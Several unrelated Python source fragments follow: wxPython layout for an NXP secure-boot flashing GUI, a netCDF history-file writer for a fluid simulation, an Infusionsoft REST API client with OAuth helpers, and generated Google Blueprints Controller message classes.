wSizer_portSetup.Add( self.m_staticText_null1PortSetup, 0, wx.ALL, 5 )
self.m_radioBtn_uart = wx.RadioButton( self.m_panel_portSetup, wx.ID_ANY, u"UART", wx.DefaultPosition, wx.Size( 60,-1 ), 0 )
wSizer_portSetup.Add( self.m_radioBtn_uart, 0, wx.ALL, 5 )
self.m_radioBtn_usbhid = wx.RadioButton( self.m_panel_portSetup, wx.ID_ANY, u"USB-HID", wx.DefaultPosition, wx.Size( 70,-1 ), 0 )
wSizer_portSetup.Add( self.m_radioBtn_usbhid, 0, wx.ALL, 5 )
self.m_staticText_portVid = wx.StaticText( self.m_panel_portSetup, wx.ID_ANY, u"COM Port:", wx.DefaultPosition, wx.Size( 95,-1 ), 0 )
self.m_staticText_portVid.Wrap( -1 )
wSizer_portSetup.Add( self.m_staticText_portVid, 0, wx.ALL, 5 )
m_choice_portVidChoices = []
self.m_choice_portVid = wx.Choice( self.m_panel_portSetup, wx.ID_ANY, wx.DefaultPosition, wx.Size( 150,-1 ), m_choice_portVidChoices, 0 )
self.m_choice_portVid.SetSelection( 0 )
wSizer_portSetup.Add( self.m_choice_portVid, 0, wx.ALL, 5 )
self.m_staticText_baudPid = wx.StaticText( self.m_panel_portSetup, wx.ID_ANY, u"Baudrate:", wx.DefaultPosition, wx.Size( 95,-1 ), 0 )
self.m_staticText_baudPid.Wrap( -1 )
wSizer_portSetup.Add( self.m_staticText_baudPid, 0, wx.ALL, 5 )
m_choice_baudPidChoices = []
self.m_choice_baudPid = wx.Choice( self.m_panel_portSetup, wx.ID_ANY, wx.DefaultPosition, wx.Size( 150,-1 ), m_choice_baudPidChoices, 0 )
self.m_choice_baudPid.SetSelection( 0 )
wSizer_portSetup.Add( self.m_choice_baudPid, 0, wx.ALL, 5 )
self.m_staticText_null2PortSetup = wx.StaticText( self.m_panel_portSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 256,5 ), 0 )
self.m_staticText_null2PortSetup.Wrap( -1 )
wSizer_portSetup.Add( self.m_staticText_null2PortSetup, 0, wx.ALL, 5 )
self.m_staticText_null3PortSetup = wx.StaticText( self.m_panel_portSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 45,-1 ), 0 )
self.m_staticText_null3PortSetup.Wrap( -1 )
wSizer_portSetup.Add( self.m_staticText_null3PortSetup, 0, wx.ALL, 5 )
self.m_bitmap_connectLed = wx.StaticBitmap( self.m_panel_portSetup, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.Size( 30,30 ), 0 )
wSizer_portSetup.Add( self.m_bitmap_connectLed, 0, wx.ALL, 5 )
self.m_staticText_null4PortSetup = wx.StaticText( self.m_panel_portSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 30,-1 ), 0 )
self.m_staticText_null4PortSetup.Wrap( -1 )
wSizer_portSetup.Add( self.m_staticText_null4PortSetup, 0, wx.ALL, 5 )
self.m_checkBox_oneStepConnect = wx.CheckBox( self.m_panel_portSetup, wx.ID_ANY, u"One Step", wx.DefaultPosition, wx.Size( -1,30 ), 0 )
wSizer_portSetup.Add( self.m_checkBox_oneStepConnect, 0, wx.ALL, 5 )
self.m_staticText_null5PortSetup = wx.StaticText( self.m_panel_portSetup, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 45,-1 ), 0 )
self.m_staticText_null5PortSetup.Wrap( -1 )
wSizer_portSetup.Add( self.m_staticText_null5PortSetup, 0, wx.ALL, 5 )
self.m_button_connect = wx.Button( self.m_panel_portSetup, wx.ID_ANY, u"Connect to ROM", wx.DefaultPosition, wx.Size( 150,-1 ), 0 )
wSizer_portSetup.Add( self.m_button_connect, 0, wx.ALL, 5 )
self.m_panel_portSetup.SetSizer( wSizer_portSetup )
self.m_panel_portSetup.Layout()
wSizer_portSetup.Fit( self.m_panel_portSetup )
self.m_notebook_portSetup.AddPage( self.m_panel_portSetup, u"Port Setup", False )
bSizer_setup.Add( self.m_notebook_portSetup, 1, wx.EXPAND |wx.ALL, 5 )
self.m_notebook_deviceStatus = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_panel_deviceStatus = wx.Panel( self.m_notebook_deviceStatus, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer_deviceStatus = wx.BoxSizer( wx.VERTICAL )
self.m_textCtrl_deviceStatus = wx.TextCtrl( self.m_panel_deviceStatus, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 250,158 ), wx.TE_MULTILINE|wx.TE_RICH2 )
bSizer_deviceStatus.Add( self.m_textCtrl_deviceStatus, 0, wx.ALL, 5 )
self.m_panel_deviceStatus.SetSizer( bSizer_deviceStatus )
self.m_panel_deviceStatus.Layout()
bSizer_deviceStatus.Fit( self.m_panel_deviceStatus )
self.m_notebook_deviceStatus.AddPage( self.m_panel_deviceStatus, u"Device Status", False )
bSizer_setup.Add( self.m_notebook_deviceStatus, 1, wx.EXPAND |wx.ALL, 5 )
wSizer_func.Add( bSizer_setup, 1, wx.EXPAND, 5 )
bSizer_boot = wx.BoxSizer( wx.VERTICAL )
wSizer_bootType = wx.WrapSizer( wx.HORIZONTAL, wx.WRAPSIZER_DEFAULT_FLAGS )
self.m_staticText_secureBootType = wx.StaticText( self, wx.ID_ANY, u"Secure Boot Type:", wx.DefaultPosition, wx.Size( 118,-1 ), 0 )
self.m_staticText_secureBootType.Wrap( -1 )
self.m_staticText_secureBootType.SetFont( wx.Font( 10, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial Rounded MT Bold" ) )
self.m_staticText_secureBootType.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_BACKGROUND ) )
wSizer_bootType.Add( self.m_staticText_secureBootType, 0, wx.ALL, 5 )
m_choice_secureBootTypeChoices = [ u"DEV Unsigned Image Boot", u"HAB Signed Image Boot", u"HAB Encrypted Image Boot", u"BEE Encrypted Image Boot" ]
self.m_choice_secureBootType = wx.Choice( self, wx.ID_ANY, wx.DefaultPosition, wx.Size( 299,-1 ), m_choice_secureBootTypeChoices, 0 )
self.m_choice_secureBootType.SetSelection( 0 )
wSizer_bootType.Add( self.m_choice_secureBootType, 0, wx.ALL, 5 )
self.m_button_allInOneAction = wx.Button( self, wx.ID_ANY, u"All-In-One Action", wx.DefaultPosition, wx.Size( 124,-1 ), 0 )
wSizer_bootType.Add( self.m_button_allInOneAction, 0, wx.ALL, 5 )
self.m_staticText_null1BootType = wx.StaticText( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 30,-1 ), 0 )
self.m_staticText_null1BootType.Wrap( -1 )
wSizer_bootType.Add( self.m_staticText_null1BootType, 0, wx.ALL, 5 )
self.m_bitmap_nxp = wx.StaticBitmap( self, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.Size( 80,30 ), 0 )
wSizer_bootType.Add( self.m_bitmap_nxp, 0, wx.ALL, 5 )
bSizer_boot.Add( wSizer_bootType, 1, wx.EXPAND, 5 )
self.m_notebook_imageSeq = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.Size( -1,450 ), 0 )
self.m_notebook_imageSeq.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
self.m_panel_genSeq = wx.Panel( self.m_notebook_imageSeq, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
self.m_panel_genSeq.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
self.m_panel_genSeq.SetBackgroundColour( wx.Colour( 64, | |
= [state.get(v) for v in self.variables_in_history]
# block all ranks until rank 0 has created the folder(s)
mpitools.barrier()
# let be very cautious
assert os.path.isdir(self.output_directory)
# Create the history file and save the initial state
self.create_history_file(grid, variables)
#self.write_history_file(state, t, n)
#self.t_next_hist = t + self.dt_hist
@timing
def write(self, state, t, n):
"""Write the current state to the history file if it is time.
When new data was written to the disk, check if the available
disk space is still above the limit. Otherwise display a
warning and pause until the user has decided to continue.
Return True if the user decides to stop the simulation after a
low-disk-space warning. Return False if everything is fine.
Arguments:
- state: current state of the model run
- t: current time of the model run
- n: current integration step of the model
"""
if t < self.t_next_hist:
# Nothing to do yet
return False
# Otherwise it is time to write data to the history file
self.write_history_file(state, t, n)
self.t_next_hist += self.dt_hist
if self.disk_limit <= 0:
# No disk space limit defined
return False
# Otherwise check if the remaining disk space is sufficient
try:
free_space = self.get_disk_space_in_GB()
except Exception as e:
print("")
print("Cannot determine available disk space.")
print("Error message:", e)
print("Disabling further disk space checks.")
self.disk_limit = 0
# This is not a reason to stop the program
return False
if free_space >= self.disk_limit:
# Everything fine
return False
# Otherwise, print a warning
print("")
print("!"*50)
print("Warning, low disk space:")
print(
"{:.2f} GB remaining in the output directory {}"
.format(free_space, self.output_directory)
)
# Ask the user what to do
while True:
answer = input(
"Do you want to continue? [Y/n] "
).lower()
if answer == "n":
# Stop the program
return True
elif answer == "y" or answer == "":
# Check if more space is free now
try:
free_space = self.get_disk_space_in_GB()
except:
# Unknown error; check free space again next time
pass
else:
# elif cannot be used here
if free_space < self.disk_limit:
# The problem persists
print("Disabling further disk space checks.")
self.disk_limit = 0
# Continue the program
return False
else:
print('Unknown answer.', end=' ')
print('Please answer with "y" or "n".')
def finalize(self, state, t, n):
"""Write the final state to the history file if necessary.
Arguments:
- state: final state of the model run
- t: last point in time of the model run
- n: total number of integration steps in the model run
"""
# Write data to the history file if it is time to do so
if n != self.last_saved_frame:
self.write_history_file(state, t, n)
def save_array_3D(self, data, name, description=""):
"""Save a 3D array of data in the history file.
Arguments:
- data: 3D array of floats to be saved in the history file;
it must be given in the convention [z, y, x], which is
returned by view("i") for variables of type Scalar
- name: a short name used to reference the variable
- description (optional): additional text saved in the history
file together with the variable
"""
with nc.Dataset(self.hist_path, "a") as ncfile:
v = ncfile.createVariable(name, float, ("z", "y", "x"))
if description:
v.long_name = description
ncfile[name] = data
def create_history_file(self, grid: Grid, variables: list):
"""Create a new history file with “variables” living on “grid”."""
# Open new netCDF file for writing data to it (or for
# overwriting existing data)
with nc.Dataset(self.hist_path, "w") as ncfile:
# Store the experiment parameters
ncfile.setncatts(self.experiment_parameters)
# Create the dimensions
ncfile.createDimension("t") # unlimited size
self.idx = {}
k0, k1, j0, j1, i0, i1 = grid.domainindices
self.idx = {}
self.idx = {"x": slice(i0, i1),
"y": slice(j0, j1),
"z": slice(k0, k1)}
for x, i in zip("xyz", "ijk"):
if self.include_halo:
dimsize = grid.size[i]
# correct slice to None (i.e. all elements)
self.idx[x] = slice(None)
else:
dimsize = getattr(grid, "n"+x)
if self.simplified_grid:
ncfile.createDimension("{}".format(x), dimsize)
continue
# “p” stands for “point”: b-point, u-point, v-point, etc.
for p in ["b", "u", "v", "w", "vor_i", "vor_j", "vor_k"]:
ncfile.createDimension("{}_{}".format(x, p), dimsize)
# Create the variables with one dimension
v = ncfile.createVariable("n", int, ("t",))
v.long_name = "integration step in the model run"
v = ncfile.createVariable("t", float, ("t",))
v.long_name = "time in the model run"
v.units = self.unit("T")
if self.simplified_grid:
v = ncfile.createVariable("x", float, ("x",))
v.long_name = grid.x_b.name
v.units = self.unit(grid.x_b.dimension)
v[:] = grid.x_b_1D[self.idx["x"]]
v = ncfile.createVariable("y", float, ("y",))
v.long_name = grid.y_b.name
v.units = self.unit(grid.y_b.dimension)
v[:] = grid.y_b_1D[self.idx["y"]]
v = ncfile.createVariable("z", float, ("z",))
v.long_name = grid.z_b.name
v.units = self.unit(grid.z_b.dimension)
v[:] = grid.z_b_1D[self.idx["z"]]
else:
v = ncfile.createVariable("x_b", float, ("x_b",))
v.long_name = grid.x_b.name
v.units = self.unit(grid.x_b.dimension)
v[:] = grid.x_b_1D[self.idx["x"]]
v = ncfile.createVariable("y_b", float, ("y_b",))
v.long_name = grid.y_b.name
v.units = self.unit(grid.y_b.dimension)
v[:] = grid.y_b_1D[self.idx["y"]]
v = ncfile.createVariable("z_b", float, ("z_b",))
v.long_name = grid.z_b.name
v.units = self.unit(grid.z_b.dimension)
v[:] = grid.z_b_1D[self.idx["z"]]
v = ncfile.createVariable("x_u", float, ("x_u",))
v.long_name = grid.x_vel["i"].name
v.units = self.unit(grid.x_vel["i"].dimension)
v[:] = grid.x_u_1D[self.idx["x"]]
v = ncfile.createVariable("y_u", float, ("y_u",))
v.long_name = grid.y_vel["i"].name
v.units = self.unit(grid.y_vel["i"].dimension)
v[:] = grid.y_u_1D[self.idx["y"]]
v = ncfile.createVariable("z_u", float, ("z_u",))
v.long_name = grid.z_vel["i"].name
v.units = self.unit(grid.z_vel["i"].dimension)
v[:] = grid.z_u_1D[self.idx["z"]]
v = ncfile.createVariable("x_v", float, ("x_v",))
v.long_name = grid.x_vel["j"].name
v.units = self.unit(grid.x_vel["j"].dimension)
v[:] = grid.x_v_1D[self.idx["x"]]
v = ncfile.createVariable("y_v", float, ("y_v",))
v.long_name = grid.y_vel["j"].name
v.units = self.unit(grid.y_vel["j"].dimension)
v[:] = grid.y_v_1D[self.idx["y"]]
v = ncfile.createVariable("z_v", float, ("z_v",))
v.long_name = grid.z_vel["j"].name
v.units = self.unit(grid.z_vel["j"].dimension)
v[:] = grid.z_v_1D[self.idx["z"]]
v = ncfile.createVariable("x_w", float, ("x_w",))
v.long_name = grid.x_vel["k"].name
v.units = self.unit(grid.x_vel["k"].dimension)
v[:] = grid.x_w_1D[self.idx["x"]]
v = ncfile.createVariable("y_w", float, ("y_w",))
v.long_name = grid.y_vel["k"].name
v.units = self.unit(grid.y_vel["k"].dimension)
v[:] = grid.y_w_1D[self.idx["y"]]
v = ncfile.createVariable("z_w", float, ("z_w",))
v.long_name = grid.z_vel["k"].name
v.units = self.unit(grid.z_vel["k"].dimension)
v[:] = grid.z_w_1D[self.idx["z"]]
v = ncfile.createVariable("x_vor_i", float, ("x_vor_i",))
v.long_name = grid.x_vor["i"].name
v.units = self.unit(grid.x_vor["i"].dimension)
v[:] = grid.x_vor_i_1D[self.idx["x"]]
v = ncfile.createVariable("y_vor_i", float, ("y_vor_i",))
v.long_name = grid.y_vor["i"].name
v.units = self.unit(grid.y_vor["i"].dimension)
v[:] = grid.y_vor_i_1D[self.idx["y"]]
v = ncfile.createVariable("z_vor_i", float, ("z_vor_i",))
v.long_name = grid.z_vor["i"].name
v.units = self.unit(grid.z_vor["i"].dimension)
v[:] = grid.z_vor_i_1D[self.idx["z"]]
v = ncfile.createVariable("x_vor_j", float, ("x_vor_j",))
v.long_name = grid.x_vor["j"].name
v.units = self.unit(grid.x_vor["j"].dimension)
v[:] = grid.x_vor_j_1D[self.idx["x"]]
v = ncfile.createVariable("y_vor_j", float, ("y_vor_j",))
v.long_name = grid.y_vor["j"].name
v.units = self.unit(grid.y_vor["j"].dimension)
v[:] = grid.y_vor_j_1D[self.idx["y"]]
v = ncfile.createVariable("z_vor_j", float, ("z_vor_j",))
v.long_name = grid.z_vor["j"].name
v.units = self.unit(grid.z_vor["j"].dimension)
v[:] = grid.z_vor_j_1D[self.idx["z"]]
v = ncfile.createVariable("x_vor_k", float, ("x_vor_k",))
v.long_name = grid.x_vor["k"].name
v.units = self.unit(grid.x_vor["k"].dimension)
v[:] = grid.x_vor_k_1D[self.idx["x"]]
v = ncfile.createVariable("y_vor_k", float, ("y_vor_k",))
v.long_name = grid.y_vor["k"].name
v.units = self.unit(grid.y_vor["k"].dimension)
v[:] = grid.y_vor_k_1D[self.idx["y"]]
v = ncfile.createVariable("z_vor_k", float, ("z_vor_k",))
v.long_name = grid.z_vor["k"].name
v.units = self.unit(grid.z_vor["k"].dimension)
v[:] = grid.z_vor_k_1D[self.idx["z"]]
# TODO: add mask if a mask is implemented
# Create variables for the model data and create a dict of
# the history file variables to make writing new data easy
self.hist_variables = {}
for variable in variables:
nickname = variable.nickname
nature = variable.get_nature()
if nature == "scalar":
# Use in the history file the same name as in the model
hist_name = nickname
v = ncfile.createVariable(
hist_name,
float,
("t", "z", "y", "x") if self.simplified_grid else
("t", "z_b", "y_b", "x_b"),
)
v.long_name = variable.name
v.units = self.unit(variable.dimension)
self.hist_variables[hist_name] = nickname
elif nature == "velocity":
if nickname == "u":
# Use in the history file the name u/v/w
modifier = str.lower
elif nickname == "U":
# Use in the history file the name U/V/W
modifier = str.upper
else:
raise NotImplementedError(
"unknown kind of velocity: " + nickname
)
for i, u in zip("ijk", "uvw"):
hist_name = modifier(u)
v = ncfile.createVariable(
hist_name,
float,
("t", "z", "y", "x") if self.simplified_grid else
("t", "z_" + u, "y_" + u, "x_" + u),
)
v.long_name = variable[i].name
v.units = self.unit(variable[i].dimension)
self.hist_variables[hist_name] = variable[i].nickname
elif nature == "vorticity":
for i in "ijk":
# Use in the history file the same name as in the model
hist_name = variable[i].nickname
v = ncfile.createVariable(
hist_name,
float,
("t", "z", "y", "x") if self.simplified_grid else
("t", "z_vor_" + i, "y_vor_" + i, "x_vor_" + i),
)
v.long_name = variable[i].name
v.units = self.unit(variable[i].dimension)
self.hist_variables[hist_name] = variable[i].nickname
else:
raise ValueError(
"unknown nature", nature, "of variable", nickname
)
def write_history_file(self, state, t, n):
"""Append the given | |
import requests
import json
from base64 import b64encode
"""
Documentation of the API: https://developer.infusionsoft.com/docs/rest/
"""
class Client:
api_base_url = "https://api.infusionsoft.com/crm/rest/v1/"
header = {"Accept": "application/json, */*", "content-type": "application/json"}
def __init__(self, client_id=None, client_secret=None, token=None):
self.client_id = client_id
self.client_secret = client_secret
self.token = token
def make_request(self, method, endpoint, data=None, json=None, **kwargs):
"""
this method do the request petition, receive the different methods (post, delete, patch, get) that the api allow
:param method:
:param endpoint:
:param data:
:param kwargs:
:return:
"""
if self.token:
self.header["Authorization"] = "Bearer " + self.token
url = '{0}{1}'.format(self.api_base_url, endpoint)
if method == "get":
response = requests.request(method, url, headers=self.header, params=kwargs)
else:
response = requests.request(method, url, headers=self.header, data=data, json=json)
return self.parse_response(response)
else:
raise Exception("To make petitions the token is necessary")
def _get(self, endpoint, data=None, **kwargs):
return self.make_request('get', endpoint, data=data, **kwargs)
def _post(self, endpoint, data=None, json=None, **kwargs):
return self.make_request('post', endpoint, data=data, json=json, **kwargs)
def _delete(self, endpoint, **kwargs):
return self.make_request('delete', endpoint, **kwargs)
def _patch(self, endpoint, data=None, json=None, **kwargs):
return self.make_request('patch', endpoint, data=data, json=json, **kwargs)
def _put(self, endpoint, json=None, **kwargs):
return self.make_request('put', endpoint, json=json, **kwargs)
def parse_response(self, response):
"""
This method get the response request and returns json data or raise exceptions
:param response:
:return:
"""
if response.status_code == 204 or response.status_code == 201:
return True
elif response.status_code == 400:
raise Exception(
"The URL {0} retrieved an {1} error. Please check your request body and try again.\nRaw message: {2}".format(
response.url, response.status_code, response.text))
elif response.status_code == 401:
raise Exception(
"The URL {0} retrieved and {1} error. Please check your credentials, make sure you have permission to perform this action and try again.".format(
response.url, response.status_code))
elif response.status_code == 403:
raise Exception(
"The URL {0} retrieved and {1} error. Please check your credentials, make sure you have permission to perform this action and try again.".format(
response.url, response.status_code))
elif response.status_code == 404:
raise Exception(
"The URL {0} retrieved an {1} error. Please check the URL and try again.\nRaw message: {2}".format(
response.url, response.status_code, response.text))
return response.json()
def oauth_access(self, callback):
"""
This method return the main url to begin the oauth flow
:param client_id:
:param callback:
:return:
"""
if self.client_id is not None and callback is not None:
url = "https://signin.infusionsoft.com/app/oauth/authorize?client_id={0}&redirect_uri={1}&response_type={2}&scope={3}".format(
self.client_id, callback, "code", "full")
return url
else:
raise Exception("The attributes necessary to get the url were not obtained.")
def exchange_code(self, redirect_uri, code):
"""
This method receive the code send in the first flow step, later make the petition to get the token
:param redirect_uri:
:param code:
:return:
"""
if self.client_id is not None and self.client_secret is not None and redirect_uri is not None and code is not None:
data = {
'client_id': self.client_id,
'redirect_uri': redirect_uri,
'client_secret': self.client_secret,
'code': code,
'grant_type': 'authorization_code',
}
url = "https://api.infusionsoft.com/token"
response = requests.post(url, data=data)
return self.parse_response(response)
else:
raise Exception("The attributes necessary to exchange the code were not obtained.")
def refresh_token(self, refresh_token):
"""
to refresh the token you must to give client_id, client_secret and refresh token
:param client_id:
:param client_secret:
:param re_token:
:return:
"""
if self.client_id is not None and self.client_secret is not None and refresh_token is not None:
url = "https://api.infusionsoft.com/token"
authorization = '{0}:{1}'.format(self.client_id, self.client_secret)
header = {'Authorization': 'Basic {0}'.format(b64encode(authorization.encode('UTF-8')).decode('UTF-8'))}
args = {'grant_type': 'refresh_token', 'refresh_token': refresh_token}
response = requests.post(url, headers=header, data=args)
return self.parse_response(response)
else:
raise Exception("The attributes necessary to refresh the token were not obtained.")
def set_token(self, token):
"""
Sets the Token for its use in this library.
:param token: A string with the Token.
:return:
"""
if token != "":
self.token = token
def get_data(self, endpoint, **kwargs):
return self._get(endpoint, **kwargs)
def create_data(self, endpoint, **kwargs):
if kwargs is not None:
params = {}
params.update(kwargs)
return self._post(endpoint, json=params)
def update_data(self, endpoint, data_id, **kwargs):
params = {}
if data_id != "":
url = '{0}/{1}'.format(endpoint, data_id)
params.update(kwargs)
return self._patch(url, json=params)
def delete_data(self, endpoint, data_id):
if data_id != "":
url = '{0}/{1}'.format(endpoint, data_id)
return self._delete(url)
def get_contact_custom_fields(self):
return self._get('contactCustomFields')
def get_contacts(self, **kwargs):
"""
To get all the contacts you can just call the method, to filter use limit, order, offset.
For other options see the documentation of the API
:return:
"""
return self._get('contacts', **kwargs)
def retrieve_contact(self, id, **kwargs):
if id != "":
endpoint = 'contacts/{0}'.format(id)
return self._get(endpoint, **kwargs)
else:
raise Exception("The ID is necessary")
def create_contact(self, **kwargs):
"""
For create a contact is obligatory to fill the email or the phone number, I also recommend to fill the given_name="<NAME>"
:param email:
:param phone_number:
:param kwargs:
:return:
"""
if kwargs is not None:
params = {}
params.update(kwargs)
return self._post('contacts', json=params)
raise Exception("To create a contact is necessary a valid name and email")
def delete_contact(self, id):
"""
To delete a contact is obligatory send The ID of the contact to delete
:param id:
:return:
"""
if id != "":
endpoint = 'contacts/{0}'.format(id)
return self._delete(endpoint)
else:
raise Exception("The ID is necessary")
def update_contact(self, id, **kwargs):
"""
To update a contact you must to send The ID of the contact to update
For other options see the documentation of the API
:param id:
:param kwargs:
:return:
"""
params = {}
if id != "":
endpoint = 'contacts/{0}'.format(id)
params.update(kwargs)
return self._patch(endpoint, json=params)
else:
raise Exception("The ID is obligatory")
def get_campaigns(self, **kwargs):
"""
To get the campaigns just call the method or send options to filter
For more options see the documentation of the API
:param limit:
:param offset:
:return:
"""
return self._get('campaigns', **kwargs)
def retrieve_campaign(self, id, **kwargs):
"""
To retrieve a campaign is necessary the campaign id
For more options see the documentation of the API
:param id:
:param kwargs:
:return:
"""
if id != "":
endpoint = 'campaigns/{0}'.format(id)
return self._get(endpoint, **kwargs)
else:
raise Exception("The ID is necessary")
def get_emails(self, **kwargs):
"""
To get the emails just call the method, if you need filter options see the documentation of the API
:param limit:
:param offset:
:param kwargs:
:return:
"""
return self._get('emails', **kwargs)
def get_opportunities(self, **kwargs):
"""
To get the opportunities you can just call the method, also you can filter, see the options in the documentation API
:param limit:
:param order:
:param offset:
:param kwargs:
:return:
"""
return self._get('opportunities', **kwargs)
def get_opportunities_pipeline(self):
"""
This method will return a pipeline of opportunities
:return:
"""
return self._get('opportunity/stage_pipeline')
def retrieve_opportunity(self, id, **kwargs):
"""
To retrieve a campaign is necessary the campaign id
For more options see the documentation of the API
:param id:
:return:
"""
if id != "":
endpoint = 'opportunities/{0}'.format(id)
return self._get(endpoint, kwargs)
else:
raise Exception("The ID is necessary")
def create_opportunity(self, **kwargs):
"""
To create an opportunity is obligatory to send a title of the opportunity, the contact who have the opportunity, and stage
For more information see the documentation of the API
:param opportunity_title:
:param contact:
:param stage:
:param kwargs:
:return:
"""
if kwargs is not None:
params = {}
params.update(kwargs)
return self._post('opportunities', json=params)
def update_opportunity(self, id, **kwargs):
"""
To update an opportunity is obligatory The ID, the other fields you can see in the documentation
:param id:
:param kwargs:
:return:
"""
params = {}
if id != "":
endpoint = 'opportunities/{0}'.format(id)
params.update(kwargs)
return self._patch(endpoint, json=params)
else:
raise Exception("The ID is necessary")
def get_products(self, **kwargs):
return self._get('products/search', **kwargs)
def retrieve_product(self, id):
if id != "":
endpoint = "products/{0}".format(id)
return self._get(endpoint)
else:
raise Exception("The ID is necessary")
def get_tasks(self, **kwargs):
return self._get('tasks', **kwargs)
def create_task(self, **kwargs):
if kwargs is not None:
params = {}
params.update(kwargs)
return self._post('tasks', json=params)
raise Exception("To create a task is necessary a title and a due_date")
def delete_task(self, id):
if id != "":
endpoint = 'tasks/{0}'.format(id)
return self._delete(endpoint)
else:
raise Exception("The ID is necessary")
def update_task(self, id, **kwargs):
params = {}
if id != "":
endpoint = 'tasks/{0}'.format(id)
params.update(kwargs)
return self._patch(endpoint, json=params)
else:
raise Exception("The ID is obligatory")
def retrieve_task(self, id):
if id != "":
endpoint = "tasks/{0}".format(id)
return self._get(endpoint)
else:
raise Exception("The ID is necessary")
def replace_task(self, id, **kwargs):
if id != "":
endpoint = "tasks/{0}".format(id)
return self._put(endpoint, **kwargs)
else:
raise Exception("The ID is necessary")
def get_orders(self, **kwargs):
return self._get('orders', **kwargs)
def retrieve_order(self, id):
if | |
supported (00000000-0000-0000-0000-000000000000).
"""
parent = _messages.StringField(1, required=True)
preview = _messages.MessageField('Preview', 2)
requestId = _messages.StringField(3)
class DeleteInput(_messages.Message):
r"""Input parameters for preview of delete operation.
Fields:
deployment: Required. Name of existing deployment to preview its deletion.
Format:
`projects/{project}/locations/{location}/deployments/{deployment}`
"""
deployment = _messages.StringField(1)
class Deployment(_messages.Message):
r"""A Deployment object.
Enums:
ErrorCodeValueValuesEnum: Output only. Code describing any errors that may
have occurred.
StateValueValuesEnum: Output only. Current state of the deployment.
Messages:
LabelsValue: User-defined metadata for the deployment.
Fields:
blueprint: Required. Blueprint to deploy.
configController: Required. Config Controller instance to deploy to.
Format:
`projects/{project}/locations/{location}/krmApiHosts/{instance}`.
createConfigController: Optional. If set, then a Config Controller
instance with a default, well-known name will be created as part of the
deployment, if it does not already exist. Note that Blueprints
Controller does not manage this Config Controller instance and only
creates it.
createTime: Output only. Time the deployment was created.
deleteResults: Output only. Locations of outputs from delete operation.
errorCode: Output only. Code describing any errors that may have occurred.
gitTarget: Optional. If set, then the hydrated blueprint will be uploaded
to the specified Git repository.
labels: User-defined metadata for the deployment.
latestRevision: Output only. Revision that was most recently applied.
Format:
`projects/{project}/locations/{location}/deployments/{deployment}/
revisions/{revision}`
name: Resource name of the deployment. Format:
`projects/{project}/locations/{location}/deployments/{deployment}`
reconcileTimeout: Optional. How long apply attempt should wait for
resource reconciliation on the Config Controller cluster to complete. If
unset, a default value of 5m will be used. A value of 0s indicates that
the Deployment will be ACTIVE as soon as resources are applied
successfully to the cluster and final resource actuation status will
need to be polled on asynchronously.
state: Output only. Current state of the deployment.
stateDetail: Output only. Additional information regarding the current
state.
updateTime: Output only. Time the deployment was last modified.
"""
class ErrorCodeValueValuesEnum(_messages.Enum):
r"""Output only. Code describing any errors that may have occurred.
Values:
ERROR_CODE_UNSPECIFIED: No error code was specified.
REVISION_FAILED: The revision failed (check its error code).
CLUSTER_CREATION_PERMISSION_DENIED: Cluster creation failed due to a
permissions issue.
CLOUD_BUILD_PERMISSION_DENIED: Cloud Build failed due to a permissions
issue.
CLUSTER_CREATION_FAILED: Cluster creation failed for a non-permissions-
related issue.
DELETE_BUILD_API_FAILED: The deletion Cloud Build failed before logs
could be generated.
DELETE_BUILD_RUN_FAILED: The deletion Cloud Build failed after logs
could be generated.
BUCKET_CREATION_PERMISSION_DENIED: A Cloud Storage bucket failed due to
a permissions issue.
BUCKET_CREATION_FAILED: A Cloud Storage bucket failed for a non-
permissions-related issue.
"""
ERROR_CODE_UNSPECIFIED = 0
REVISION_FAILED = 1
CLUSTER_CREATION_PERMISSION_DENIED = 2
CLOUD_BUILD_PERMISSION_DENIED = 3
CLUSTER_CREATION_FAILED = 4
DELETE_BUILD_API_FAILED = 5
DELETE_BUILD_RUN_FAILED = 6
BUCKET_CREATION_PERMISSION_DENIED = 7
BUCKET_CREATION_FAILED = 8
class StateValueValuesEnum(_messages.Enum):
r"""Output only. Current state of the deployment.
Values:
STATE_UNSPECIFIED: The default value. This value is used if the state is
omitted.
CREATING: The deployment is being created.
ACTIVE: The deployment is healthy.
UPDATING: The deployment is being updated.
DELETING: The deployment is being deleted.
FAILED: The deployment has encountered an unexpected error.
SUSPENDED: The deployment is no longer being actively reconciled. This
may be the result of recovering the project after deletion.
"""
STATE_UNSPECIFIED = 0
CREATING = 1
ACTIVE = 2
UPDATING = 3
DELETING = 4
FAILED = 5
SUSPENDED = 6
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""User-defined metadata for the deployment.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
blueprint = _messages.MessageField('Blueprint', 1)
configController = _messages.StringField(2)
createConfigController = _messages.BooleanField(3)
createTime = _messages.StringField(4)
deleteResults = _messages.MessageField('ApplyResults', 5)
errorCode = _messages.EnumField('ErrorCodeValueValuesEnum', 6)
gitTarget = _messages.MessageField('GitTarget', 7)
